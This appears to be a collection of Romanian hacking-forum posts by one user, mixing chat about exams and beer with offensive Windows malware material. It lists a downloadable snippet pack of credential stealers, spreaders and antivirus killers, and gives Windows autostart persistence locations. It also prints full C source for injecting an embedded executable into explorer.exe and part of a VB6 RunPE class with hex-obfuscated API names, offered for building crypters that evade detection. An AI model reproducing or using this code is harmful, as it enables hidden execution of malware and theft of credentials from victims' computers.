Nytro

Pe baza de cat sunt de dastepti, pe baza de invitatii, pe baza de care tine mai mult la bautura... De ce sa fie o anumita cerinta sa fi membru pe forum? E atat de important sa fi membru aici? Ce ar avea de castigat? Eu as zice sa le cerem bani atunci...

Nu prea inteleg de ce vrei VIP... Pai sa vad, daca fac fifty-fifty cu kwe, sau el s-a lasat de baut...?

Eu mi-am luat niste memoranduri cred ca se cheama, carticele in format mic, cu scris mic si cu multe prostii prin ele. Dar la mate sunt sugestii de rezolvari, nu vor fi subiectele de anul asta... La mate imi e frica... Si totusi nu stiu daca sa ma risc sa copiez (daca e "periculos"). Mai bine iau un 5 (la mate nu stiu daca voi fi in stare) si sunt multumit.

Daca veniti de pe hellsoft si hackforums e clar, ma inclin in fata voastra.

Teoretic se pot face si virusi in HTML. <a href="aaaaaaa_nops_shellcode">A</a> Si sa fie browser engine-ul prost, sa aibe buffer overflow

Eu vreau un butoias de Calrsberg

E multi care nu are ce face pe acasa xcata, se baga si ei in seama. In practica se poate folosi orice limbaj din care se poate apela o functie API. Se foloseste Visual Basic pentru ca e practic mai simplu, mai usor de invatat. E mai "smecher" C++. Si cred ca principalul avantaj il reprezinta pointerii. Si faptul ca pentru C++ exista deja acele headere. Decat incluzi <window.h> si apelezi functia, nu trebuie sa o declari. Dar in mare, ce poti face in C++ (aproape orice, cred ca nu chiar orice) poti face si in Visual Basic, sau C# sau alt limbaj de programare.

Pai e important. Eu vreau sa vad care din zmeii de mai sus e mai dastept.

Eu cred ca va dau ban la toti ca vad ca sunteti prea destepti pentru lumea asta...

Driver-ul pe care il are kernelul ofera doar suport read-only pentru NTFS. Dar ntfs-3g ofera suport read-write. Da, trebuiau montate daca nu erau montate automat cum ar trebui sa faca un sistem de operare modern... Eu vad in asta o bila neagra pentru backtrack. Bine, si una pentru Tinky.

Ma uitam la fetele astora din corelan, si mi se par putin ciudati

Unii au bac Eu o sa fiu mai "implicat" dupa ce termin cu bacul apoi cu admiterea. Va ramane pentru ceva timp cum este acum.

Interesant Si el e cel care l-a descoperit: http://www.corelan.be:8800/wp-content/uploads/2010/03/tecr0cFace1.jpg

De fapt au fost postate si acolo de cineva care le luase de altundeva. Opensc nu e tocmai raiul programatorilor.

Daca nu e mult de munca ma bag eu. Nu stau insa prea bine la CSS, dar ma descurc

Source: http://www.opensc.ws/snippets/10961-release-w0rmys-codebase-v2-0-a.html Snippets: Bash - Backup Script.txt Bash - Battery Life.txt Bash - BlackJack.txt Bash - Change (mask) the MAC address on your nic.txt Bash - Detect then eject the cdrom.txt Bash - File Limiter.txt Bash - PPP Connection Checker.txt Bash - Recursive Linecount in directory.txt Bash - Resolve&Display your IP Address.txt Bash - Retreive the complete list of ports.txt Bash - Setting up common aliases.txt Bash - Simple Bash backup script.txt Bash - Simple firewall script.txt Bash - Take Screenshots of Xwindows.txt C# - Add proxy support to webbrowser.txt C# - Anti Sandboxie.txt C# - AntiSandboxie.txt C# - Anti ThreatExpert.txt C - Binary Adder.txt C# - Calculate an exponent.txt C# - CD Key Stealer.txt C# - Check Avaible Posts.txt C# - Check for 64bits OS.txt C# - Check if a file is already open (or read only).txt C# - Check if a printer is offline or online.txt C# - Check if a process is running.txt C# - Check if the CD-ROM is loaded.txt C# - Count vowels in a string.txt C# - Create a new net user.txt C# - Create local Windows user account.txt C - Creates a magic square.txt C - DateTime with windows.h.txt C# - Delete registry key value in HKEY_CLASSES_ROOT.txt C# - Delete Self.txt C# - Desactivate UAC.txt C# - Disable Task Manager.txt C++ - Disable Task Manager.txt C# - Downloader.txt C - Echo.txt C# - Empty Recycle Bin.txt C# - Encryption Class.txt C# - EOF Data.txt C# - FileZilla Stealer.txt C# - Generate a random color with XNA.txt C# - Generate password.txt C# - Get 3 letters computer country name.txt C# - Get a file's MD5 Hash.txt C# - Get a HTML Page's Title.txt C# - Get current users profile type (using Win32 API).txt C# - Get Headers from a website.txt C# - Get info about drives installed.txt C# - Get info about physical memory.txt C# - Get IP Information.txt C# - Get recycle bin's size and file count.txt C# - Get RecycleBin's size and file count.txt C# - Gets the contents of a pastebin entry by id.txt C# - Getting the HEX.txt C# - Get UNC path of mapped drives.txt C# - Get users default browser.txt C# - Get your Gmail contact list.txt C - Gnome Sort.txt C# - Hiding console window.txt C# - IP address range finder helper class.txt C# - Kill Ad-Adware.txt C# - Kill a process by user.txt C# - Kill Malwarebytes Anti-Malware.txt C# - Kill SpyBot Search&Destroy.txt C# - Mutex.txt C - Name of current user.txt C# - Open Windows Firewall Port.txt C# - Post to Pastebin!.txt C - ReadWord.txt C# - Rendering text with a shadow in XNA.txt C++ - Restart your computer.txt C# - Retrieve all computers on network.txt C# - Retrieve list of avaible printer ports.txt C# - Send Email with Attachment.txt C# - Session for WinForms.txt C# - Set default printer.txt C# - ShiftList.txt C# - Show&Hide desktop icons.txt C# - Show&hide Windows Taskbar.txt C# - Simple 2D line in XNA.txt C# - Split String.txt C# - Static dll injector.txt C# - Take screenshot.txt C# - USB Spread.txt C# - Use WMI to get a list of all installed printers.txt C# - Use WMI to get the system's up-time.txt C# - uTorrent seeder.txt C# - Windows autostart.txt C# - XOR Encryption.txt Delphi - Bytes to real size.txt Delphi - Default Browser.txt Delphi - Disable XP Firewall.txt Delphi - Get File Info.txt Delphi - Ip&Port Check Utility.txt Delphi - Little injection.txt Delphi - Screenshot with mouse position.txt Delphi - Uptime (Spy-Net).txt F# - AES Encryption.txt F# - IRC Bot.txt Lisp - A Clojure function to find the average of an arbitrary number of numbers.txt Lisp - A function to flip the arguments of another function in Clojure.txt Lisp - Compute factorial in Clojure.txt Lisp - Computer Generated HAIKU.txt Lisp - Example of using refs to maintain, alter, and use mutable state in Clojure.txt Lisp - Fibonacci Sequence.txt Lisp - Fibonancci Sequence.txt Lisp - File IO example using c.c.duck-streams in Clojure.txt Lisp - Function to find the max value in a sequence in Clojure.txt Lisp - GPA Calculator.txt Lisp - Swing example in Clojure.txt Lisp - Tic-Tac-Toe.txt Python - CS Server Info.txt Python - Get TITLE.txt Python - Google Search.txt Python - IRC Bot (l33t).txt Python - IRC Bot.txt Python - MD5 Search.txt Python - Skype Bot.txt Ruby - Angle Conversion.txt Ruby - Bandwidth Usage in Linux.txt Ruby - Check if a number is prime.txt Ruby - Defficient Number.txt Ruby - Get Confirmation.txt Ruby - Hangman.txt Ruby - Regression Line.txt Ruby - Reverse a string.txt Ruby - ROT13.txt Ruby - Sum of any series.txt Ruby - Sum of Divisors.txt Ruby - Write a number in English.txt VB6 - Admin Check.txt VB6 - Automatic shutdown for windows in VBS.txt VB6 - Change Desktop Settings via registry.txt VB6 - Change System Date Format.txt VB6 - Check if a file exists.txt VB6 - Check if exe is running.txt VB6 - Close all forms in your applications.txt VB6 - Convert Binary To Decimal.txt VB6 - Copy all files from directory to another.txt VB6 - Detect Windows Version.txt VB6 - Disable Ctrl+Alt+Del.txt VB6 - Download a file from the Internet.txt VB6 - Download file using FTP.txt VB6 - DynDNS Stealer.txt VB6 - Easy read&write to Windows registry.txt VB6 - File Download to Temp Dir.txt VB6 - FileZilla Stealer.txt VB6 - Find your application's path.txt VB6 - Get default browser in 5 lines.txt VB6 - Get MSN Passwords.txt VB6 - Get OS Version.txt VB6 - Get Screen Resolution.txt VB6 - Get System Volume Information.txt VB6 - Get Windows Username.txt VB6 - Hangman.txt VB6 - Kill a file in use.txt VB6 - Open&Close CD ROM.txt VB6 - Password Generator.txt VB6 - Prevent a program from running.txt VB6 - Read Registry.txt VB6 - Running Programs Using VBScript.txt VB6 - Send Batch Email.txt VB6 - Show&Hide Taskbar (WINDOWS).txt VB6 - Shutdown Windows.txt VB6 - Simple en&decryption.txt VB6 - String Rotation.txt VB6 - System Start Time.txt VB6 - Tic Tac Toe.txt VB6 - Turn Off Monitor.txt VB6 - Upload file to FTP Server.txt VB6 - Windows Running Time.txt VB6 - Windows XP Task manager Disabler&Enabler.txt VB6 - Write to registry.txt VB6 - XOR Encryption Function.txt VB6 - Zip files with WinZip in VB6.txt VB.NET - 4chan spammer.txt VB.NET - Add to startup (Registry).txt VB.NET - Animating Text.txt VB.NET - Anti Modules.txt VB.NET - Auto Crop Image.txt VB.NET - Base64 to image.txt VB.NET - Bomb noise.txt VB.NET - Calculated Click.txt VB.NET - Calender.txt VB.NET - Change Desktop Background.txt VB.NET - Change the language of your application.txt VB.NET - Change Wallpaper.txt VB.NET - Check Battery Status.txt VB.NET - Check if exe is running.txt VB.NET - Check if file is in use.txt VB.NET - Check if username is in use.txt VB.NET - Check URL for availability.txt VB.NET - Check Windows Password.txt VB.NET - Clear IE Browser History&Cookies.txt VB.NET - Convert file size to KB, MB, GB and TB.txt VB.NET - Convert file size to KB,MB,GB, TB.txt VB.NET - Corrupt.txt VB.NET - Cripple EXE.txt VB.NET - Cryptographu - Encryptions&Decryptions.txt VB.NET - Date Extensions.txt VB.NET - Delete Cookies.txt VB.NET - Disable Firewall.txt VB.NET - Disable 'Show Hidden Files and Folders Option'.txt VB.NET - Disable [X], ALT+F4, CTRL+W and context.txt VB.NET - Empty Recycle Bin.txt VB.NET - Enumerate Installed Software.txt VB.NET - FireFTP Passwords.txt VB.NET - Force Steam login.txt VB.NET - Format a phone number.txt VB.NET - FormatWith.txt VB.NET - Generate Captcha.txt VB.NET - Get all table & Column names from database.txt VB.NET - GetBetweenAll.txt VB.NET - GetBetween.txt VB.NET - Get COD4 Key.txt VB.NET - Get default browser path.txt VB.NET - Get External IP.txt VB.NET - Get Folder Size.txt VB.NET - Get how long the computer has been running.txt VB.NET - Get or set Desktop background color.txt VB.NET - Get own Internet IP.txt VB.NET - Get percent value.txt VB.NET - Give file an attribute.txt VB.NET - Handling .ini files.txt VB.NET - Hash.txt VB.NET - Hide a process window.txt VB.NET - Instant PC Shutdown.txt VB.NET - Invert colors from image.txt VB.NET - Log file.txt VB.NET - MD5 from file.txt VB.NET - MD5 Hash.txt VB.NET - Melt File - NO DROPS.txt VB.NET - Minimize to tray.txt VB.NET - Mouse Click.txt VB.NET - MsgBox If statement.txt VB.NET - MSN Nickname Changer.txt VB.NET - MSN Spreader.txt VB.NET - Multiple File Copy.txt VB.NET - Null PE Info.txt VB.NET - Packetwise File Copy.txt VB.NET - Polymorphic RC4 Encryption.txt VB.NET - Prevent Search.txt VB.NET - Program Updater.txt VB.NET - ProgressBar code.txt VB.NET - RC4 Encryption.txt VB.NET - Read&Write EOF.txt VB.NET - Resize image to fit in picturebox.txt VB.NET - Resolution Math.txt VB.NET - Screenshot.txt VB.NET - Show system time.txt VB.NET - String & Image Conversion.txt VB.NET - Strip HTML.txt VB.NET - Test for Internet Connection.txt VB.NET - Windows Live Messenger 'Now Playing'.txt Download: http://www.2shared.com/file/tTxgNb0z/Documents.html

Nu stiu cine le-a aflat pe toate: Registry Autostart Locations 1. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ All values in this key are executed. 2. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\ All values in this key are executed, and then their autostart reference is deleted. 3. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\ All values in this key are executed as services. 4. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce\ All values in this key are executed as services, and then their autostart reference is deleted. 5. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ All values in this key are executed. 6. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\ All values in this key are executed, and then their autostart reference is deleted. 7. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup\ Used only by Setup. Displays a progress dialog box as the keys are run one at a time. 8. HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Run\ Similar to the Run key from HKEY_CURRENT_USER. 9. HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\RunOnce\ Similar to the RunOnce key from HKEY_CURRENT_USER. 10. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon The "Shell" value is monitored. This value is executed after you log in. 11. HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\ All subkeys are monitored, with special attention paid to the "StubPath" value in each subkey. 12. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\ All subkeys are monitored, with special attention paid to the "StaticVXD" value in each subkey. 13. HKEY_CURRENT_USER\Control Panel\Desktop The "SCRNSAVE.EXE" value is monitored. This value is launched when your screen saver activates. 14. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager The "BootExecute" value is monitored. Files listed here are Native Applications that are executed before Windows starts. 15. HKEY_CLASSES_ROOT\vbsfile\shell\open\command\ Executed whenever a .VBS file (Visual Basic Script) is run. 16. HKEY_CLASSES_ROOT\vbefile\shell\open\command\ Executed whenever a .VBE file (Encoded Visual Basic Script) is run. 17. HKEY_CLASSES_ROOT\jsfile\shell\open\command\ Executed whenever a .JS file (Javascript) is run. 18. HKEY_CLASSES_ROOT\jsefile\shell\open\command\ Executed whenever a .JSE file (Encoded Javascript) is run. 19. HKEY_CLASSES_ROOT\wshfile\shell\open\command\ Executed whenever a .WSH file (Windows Scripting Host) is run. 20. HKEY_CLASSES_ROOT\wsffile\shell\open\command\ Executed whenever a .WSF file (Windows Scripting File) is run. 21. HKEY_CLASSES_ROOT\exefile\shell\open\command\ Executed whenever a .EXE file (Executable) is run. 22. HKEY_CLASSES_ROOT\comfile\shell\open\command\ Executed whenever a .COM file (Command) is run. 23. HKEY_CLASSES_ROOT\batfile\shell\open\command\ Executed whenever a .BAT file (Batch Command) is run. 24. HKEY_CLASSES_ROOT\scrfile\shell\open\command\ Executed whenever a .SCR file (Screen Saver) is run. 25. HKEY_CLASSES_ROOT\piffile\shell\open\command\ Executed whenever a .PIF file (Portable Interchange Format) is run. 26. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ Services marked to startup automatically are executed before user login. 27. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock2\Parameters\Protocol_Catalog\Catalog_Entries\ Layered Service Providers, executed before user login. 28. HKEY_LOCAL_MACHINE\System\Control\WOW\cmdline Executed when a 16-bit Windows executable is executed. 29. HKEY_LOCAL_MACHINE\System\Control\WOW\wowcmdline Executed when a 16-bit DOS application is executed. 30. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit Executed when a user logs in. 31. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\ Executed by explorer.exe as soon as it has loaded. 32. HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\run Executed when the user logs in. 33. HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load Executed when the user logs in. 34. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\ Subvalues are executed when Explorer initialises. 35. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\ Subvalues are executed when Explorer initialises. Folder Autostart Locations 1. windir\Start Menu\Programs\Startup\ 2. User\Startup\ 3. All Users\Startup\ 4. windir\system\iosubsys\ 5. windir\system\vmm32\ 6. windir\Tasks\ File Autostart Locations 1. c:\explorer.exe 2. c:\autoexec.bat 3. c:\config.sys 4. windir\wininit.ini 5. windir\winstart.bat 6. windir\win.ini - [windows] "load" 7. windir\win.ini - [windows] "run" 8. windir\system.ini - [boot] "shell" 9. windir\system.ini - [boot] "scrnsave.exe" 10. windir\dosstart.bat 11. windir\system\autoexec.nt 12. windir\system\config.nt Sper sa va ajute

Author: #Zero Zero: Well, this code inject the executable that it has on resource section into 'explorer.exe' process. The code really injects the executable, this will not create a new 'explorer.exe' process. #pragma comment (linker,"/NODEFAULTLIB") #pragma comment (linker,"/ENTRY:main") #include <windows.h> #include <Tlhelp32.h> #include "resource.h" int main() { PIMAGE_DOS_HEADER IDH; PIMAGE_NT_HEADERS INTH; PIMAGE_SECTION_HEADER ISH; //Cargamos el resource HRSRC hResource=FindResourceA(NULL,(LPCSTR)MAKEINTRESOURCE(IDR_EXE1),"EXE"); DWORD ResourceSize=SizeofResource(NULL,hResource); HGLOBAL hGlob=LoadResource(NULL,hResource); LPSTR lpFileMaped=(LPSTR)LockResource(hGlob); //Obtenemos la cabecera DOS y PE en las estructuras IDH=(PIMAGE_DOS_HEADER)&lpFileMaped[0]; INTH=(PIMAGE_NT_HEADERS)&lpFileMaped[IDH->e_lfanew]; DWORD PID=0; HANDLE hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); PROCESSENTRY32 pInfo; pInfo.dwSize=sizeof(PROCESSENTRY32); //Obtenemos el PID del 'explorer.exe' Process32First(hSnapshot,&pInfo); for(;lstrcmpA(pInfo.szExeFile,"explorer.exe") { Process32Next(hSnapshot,&pInfo); } CloseHandle(hSnapshot); PID=pInfo.th32ProcessID; //Abrimos el proceso en el que nos inyectaremos HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,PID); //Creamos el buffer del tamaño del SizeOfImage en el que cargaremos el ejecutable LPSTR ExeBuffer=(LPSTR)VirtualAllocEx(hProcess,0,INTH->OptionalHeader.SizeOfImage,MEM_RESERVE|MEM_COMMIT,PAGE_EXECUTE_READWRITE); //Copiamos la cabecera DOS y PE al buffer WriteProcessMemory(hProcess,&ExeBuffer[0],&lpFileMaped[0],INTH->OptionalHeader.SizeOfHeaders,0); //Copiamos las secciones en su VirtualOffset en el buffer for(DWORD i=0;i<INTH->FileHeader.NumberOfSections;i++) { ISH=(PIMAGE_SECTION_HEADER)&lpFileMaped[IDH->e_lfanew+sizeof(IMAGE_NT_HEADERS)+sizeof(IMAGE_SECTION_HEADER)*i]; WriteProcessMemory(hProcess,&ExeBuffer[ISH->VirtualAddress],&lpFileMaped[ISH->PointerToRawData],ISH->SizeOfRawData,0); } //Calculamos el delta entre la dirección del buffer y el ImageBase DWORD Delta=(((DWORD)ExeBuffer)-INTH->OptionalHeader.ImageBase); //------------------------------------------------------------ /* -Reubicamos la dirección base del ejecutable <img src="http://zero.serhackernoesilegal.com/wp-includes/images/smilies/icon_biggrin.gif" alt=":D" class="wp-smiley"> - */ //------------------------------------------------------------ //Si no hay tabla de reubicación, salimos if(INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size==0) { MessageBoxA(0,"No hay relocation table!",0,0); return false; } //Obteemos el Image Base Relocation //Copiamos el Image Base Relocation de los datos en el proceso a un buffer en el nuestro para //poder trabajar con él más comodamente PIMAGE_BASE_RELOCATION IBR=(PIMAGE_BASE_RELOCATION)GlobalAlloc(GPTR,sizeof(IMAGE_BASE_RELOCATION)); PIMAGE_BASE_RELOCATION PIBR=(PIMAGE_BASE_RELOCATION)(ExeBuffer+INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); ReadProcessMemory(hProcess,(LPVOID)PIBR,IBR,sizeof(IMAGE_BASE_RELOCATION),0); //Vamos recorriendo todas las etradas del bloque for (DWORD n=0;IBR->VirtualAddress>0;n++) { //Obtenemos el Bloque de reubicación LPSTR RelocationBlock=(LPSTR)(ExeBuffer+IBR->VirtualAddress); //Obtenemos la primera entrada del bloque LPWORD RelocationEntry=(LPWORD)((LPSTR)PIBR+sizeof(IMAGE_BASE_RELOCATION)); //Recorremos todas las entradas del bloque for (DWORD i=0;i<((IBR->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))/2);i++,RelocationEntry++) { WORD valor; ReadProcessMemory(hProcess,RelocationEntry,&valor,2,0); //Obtenemos los 4 bits que definen el tipo de reubicación DWORD type=valor>>12; //Obtenemos los 12 bits que definen la dirección de la reubicación DWORD offset=valor&0xFFF; //Si el tipo de reubicación es relativo a la dirección base, añadimso el delta if(type==IMAGE_REL_BASED_HIGHLOW) { //Añadimos a la dirección que depende del imagebase original //el delta entre el imagebase y nuestra dirección base LPDWORD newAddr=(LPDWORD)(RelocationBlock+offset); DWORD NewValue; ReadProcessMemory(hProcess,newAddr,&NewValue,4,0); NewValue+=Delta; WriteProcessMemory(hProcess,newAddr,&NewValue,4,0); } } //Vamos al siguiente bloque PIBR=(PIMAGE_BASE_RELOCATION)(((DWORD)PIBR)+IBR->SizeOfBlock); ReadProcessMemory(hProcess,(LPVOID)PIBR,IBR,sizeof(IMAGE_BASE_RELOCATION),0); } GlobalFree(IBR); //--------------------------------------------------------------------- /* -Cargamos los valores de la IAT para poder llamar a las apis- */ //--------------------------------------------------------------------- PIMAGE_THUNK_DATA ITD; PIMAGE_THUNK_DATA PITD; PIMAGE_IMPORT_BY_NAME IIBN; //Comprobamos si hay Import Data Descriptor if (INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size>0) { //Obtenemos el Import Data Descriptor //Copiamos el Import Data Descriptor de los datos en el proceso a un buffer en el nuestro para //poder trabajar con él más comodamente PIMAGE_IMPORT_DESCRIPTOR IID=(PIMAGE_IMPORT_DESCRIPTOR)GlobalAlloc(GPTR,sizeof(IMAGE_IMPORT_DESCRIPTOR)); PIMAGE_IMPORT_DESCRIPTOR PIID=(PIMAGE_IMPORT_DESCRIPTOR)(ExeBuffer+INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress); ReadProcessMemory(hProcess,(LPVOID)PIID,IID,sizeof(IMAGE_IMPORT_DESCRIPTOR),0); //Vamos recorriendo todas las Dll's importadas por el ejecutable for (;IID->Name;) { //Obtenemos la longitud del nombre de la dll DWORD szName=0; CHAR miByte=1; for(int i=0;miByte;i++) { szName=i; ReadProcessMemory(hProcess,ExeBuffer+IID->Name+i,&miByte,1,0); } //Obtenemos el nombre de la dll LPSTR lpName=(LPSTR)GlobalAlloc(GPTR,szName+1); ReadProcessMemory(hProcess,ExeBuffer+IID->Name,lpName,szName+1,0); //Cargamos la dll HMODULE hLib=LoadLibraryA(lpName); //Obtenemos la dirección al primer miembro del array Image Thunk Data's PITD=(PIMAGE_THUNK_DATA)((DWORD)ExeBuffer+IID->FirstThunk); ITD=(PIMAGE_THUNK_DATA)GlobalAlloc(GPTR,sizeof(IMAGE_THUNK_DATA)); ReadProcessMemory(hProcess,PITD,ITD,sizeof(IMAGE_THUNK_DATA),0); //Vamos recorriendo las funciones importadas for (;ITD->u1.Ordinal;) { miByte=1; //Obtenemos la longitud del nombre de la API for(int i=0;miByte;i++) { szName=i; LPSTR puntero=ExeBuffer+ITD->u1.Function+2; puntero+=i; ReadProcessMemory(hProcess,puntero,&miByte,1,0); } //Cargamos el Image Import By Name para obtener el nombre IIBN=(PIMAGE_IMPORT_BY_NAME)GlobalAlloc(GPTR,sizeof(IMAGE_IMPORT_BY_NAME)+szName); ReadProcessMemory(hProcess,ExeBuffer+ITD->u1.Function,IIBN,sizeof(IMAGE_IMPORT_BY_NAME)+szName,0); //Obtenemos la dirección de la función y la guardamos en la IAT DWORD lpAPI=(DWORD)GetProcAddress(hLib,(LPCSTR)&IIBN->Name); WriteProcessMemory(hProcess,ExeBuffer+IID->FirstThunk,&lpAPI,4,0); /* Error HERE!*/ PITD++; ReadProcessMemory(hProcess,PITD,ITD,sizeof(IMAGE_THUNK_DATA),0); } PIID++; ReadProcessMemory(hProcess,(LPVOID)PIID,IID,sizeof(IMAGE_IMPORT_DESCRIPTOR),0); GlobalFree(lpName); GlobalFree(ITD); } GlobalFree(IID); } //Obteemos el EntryPoint de ejecutable que cargamos en el buffer DWORD EntryPoint=((DWORD)ExeBuffer)+INTH->OptionalHeader.AddressOfEntryPoint; //Llamamos al EntryPoint CreateRemoteThread(hProcess,0,0,(LPTHREAD_START_ROUTINE)EntryPoint,0,0,0); return 0; } Some users told me that with some executables the code is not running. I tried to fix it for a long time, but i couldn't do it yet, so with executables who uses de C Run Time Library or some similar, code could fail. Furthermore, I let a anti-kiddie mistake, marked with a "Error Here" comment. Zero

E la moda sa ai multe programe de hack in calculator, desi nu sti nici macar ce fac. E insa si asta o idee buna, cand ai nevoie de ceva, gasesti rapid.

E o diferenta intre "infectate" si "detectate".

O metoda "draguta" de apel dinamic. Autorul nu il stiu, cred ca e vorba de "Skillless". #include <windows.h> int main() { HINSTANCE Dll = LoadLibrary("user32.dll"); DWORD(*Func)(void) = (DWORD(*)(void))GetProcAddress(Dll, "MessageBoxA"); HWND A = 0; LPCTSTR B = "Question?"; LPCTSTR C = "Title!"; UINT D = MB_ICONEXCLAMATION | MB_YESNO; asm("push %0" :: "r"(D)); asm("push %0" :: "r"(C)); asm("push %0" :: "r"(); asm("push %0" :: "r"(A)); Func(); asm("pop %0" :: "r"(A)); asm("pop %0" :: "r"(); asm("pop %0" :: "r"(C)); asm("pop %0" :: "r"(D)); FreeLibrary(Dll); return 0; } Va dati si voie seama ce face, ce functie apeleaza si cum.

Pentru incarcarea unui executabil in memorie, pentru cei care vor sa faca un crypter. Author: f0rce Creditele (pe ce este bazata munca sa) sunt in fisierul clasa (.cls) pentru Visual Basic 6 (sa inteleaga toata lumea). Ar trebui sa functioneze pe XP, Vista, Windows 7, daca am timp o sa il testez. '--------------------------------------------------------------------------------------- ' Module : cRunPE ' DateTime : 14/06/2010 ' Author : f0rce ' Purpose : RunPE ' Usage : At your own risk ' Requirements: None ' Distribution: You can freely use this code in your own ' applications, but you may not reproduce ' or publish this code on any web site, ' online service, or distribute as source ' on any media without express permission. ' ' Thanks to : SqUeEzEr - NTLoadLibrary & NTGetProcAddress ' Cobein - Normal RunPE structure ' Karcrack - Invoke ' ' Compile : It work with all Compile Options but Compile with Native it will be FUD ' ' History : 14/06/2010 First Cut.................................................... '--------------------------------------------------------------------------------------- Option Explicit Private Const THUNK_APICALL As String = "384234433234303835313C5041544348313E45383C5041544348323E3539383930313636333143304333" '"8B4C240851<PATCH1>E8<PATCH2>5989016631C0C3" Private Const PATCH1 As String = "3C5041544348313E" '"<PATCH1>" Private Const PATCH2 As String = "3C5041544348323E" '"<PATCH2>" Private Declare Function LdrLoadDll Lib "NTDLL" (ByVal pWPathToFile As Long, ByVal Flags As Long, ByRef pwModuleFileName As UNICODE_STRING, ByRef ModuleHandle As Long) As Long Private Declare Sub MoveMe Lib "MSVBVM60" Alias "__vbaCopyBytes" (ByVal Size As Long, Dest As Any, Source As Any) Private Declare Sub RtlInitUnicodeString Lib "NTDLL" (DestinationString As Any, ByVal SourceString As Long) Private Declare Function LdrGetProcedureAddress Lib "NTDLL" (ByVal ModuleHandle As Long, ByRef paFunctionName As Long, ByVal Ordinal As Integer, ByRef FunctionAddress As Long) As Long Private c_bInit As Boolean Private c_lVTE As Long Private c_lOldVTE As Long Private c_bvASM(&HFF) As Byte Private Const CONTEXT_FULL As Long = &H10007 Private Const MAX_PATH As Integer = 260 Private Const CREATE_SUSPENDED As Long = &H4 Private Const MEM_COMMIT As Long = &H1000 Private Const MEM_RESERVE As Long = &H2000 Private Const PAGE_EXECUTE_READWRITE As Long = &H40 Private Const sKlib As String = "4B65726E656C3332" 'Kernel32 Private Const sNlib As String = "4E74646C6C" 'Ntdll Private Const sCApi As String = "43726561746550726F6365737357" 'CreateProcessW Private Const sNApi As String = "4E74556E6D6170566965774F6653656374696F6E" 'NtUnmapViewOfSection Private Const sRtApi As String = "52746C4D6F76654D656D6F7279" 'RtlMoveMemory Private Const sVApi As String = "5669727475616C416C6C6F634578" 'VirtualAllocEx Private Const sWApi As String = "577269746550726F636573734D656D6F7279" 'WriteProcessMemory Private Const sGApi As String = "476574546872656164436F6E74657874" 'GetThreadContext Private Const sSApi As String = "536574546872656164436F6E74657874" 'SetThreadContext Private Const sRApi As String = "526573756D65546872656164" 'ResumeThread Private Type UNICODE_STRING uLength As Integer uMaximumLength As Integer pBuffer As Long End Type Private Type STARTUPINFO cb As Long lpReserved As Long lpDesktop As Long lpTitle As Long dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As Long hStdInput As Long hStdOutput As Long hStdError As Long End Type Private Type PROCESS_INFORMATION hProcess As Long hThread As Long dwProcessID As Long dwThreadID As Long End Type Private Type FLOATING_SAVE_AREA ControlWord As Long StatusWord As Long TagWord As Long ErrorOffset As Long ErrorSelector As Long DataOffset As Long DataSelector As Long RegisterArea(1 To 80) As Byte Cr0NpxState As Long End Type Private Type CONTEXT ContextFlags As Long Dr0 As Long Dr1 As Long Dr2 As Long Dr3 As Long Dr6 As Long Dr7 As Long FloatSave As FLOATING_SAVE_AREA SegGs As Long SegFs As Long SegEs As Long SegDs As Long Edi As Long Esi As Long Ebx As Long Edx As Long Ecx As Long Eax As Long Ebp As Long Eip As Long SegCs As Long EFlags As Long Esp As Long SegSs As Long End Type Private Type IMAGE_DOS_HEADER e_magic As Integer e_cblp As Integer e_cp As Integer e_crlc As Integer e_cparhdr As Integer e_minalloc As Integer e_maxalloc As Integer e_ss As Integer e_sp As Integer e_csum As Integer e_ip As Integer e_cs As Integer e_lfarlc As Integer e_ovno As Integer e_res(0 To 3) As Integer e_oemid As Integer e_oeminfo As Integer e_res2(0 To 9) As Integer e_lfanew As Long End Type Private Type IMAGE_FILE_HEADER Machine As Integer NumberOfSections As Integer TimeDateStamp As Long PointerToSymbolTable As Long NumberOfSymbols As Long SizeOfOptionalHeader As Integer Characteristics As Integer End Type Private Type IMAGE_DATA_DIRECTORY VirtualAddress As Long Size As Long End Type Private Type IMAGE_OPTIONAL_HEADER Magic As Integer MajorLinkerVersion As Byte MinorLinkerVersion As Byte SizeOfCode As Long SizeOfInitializedData As Long 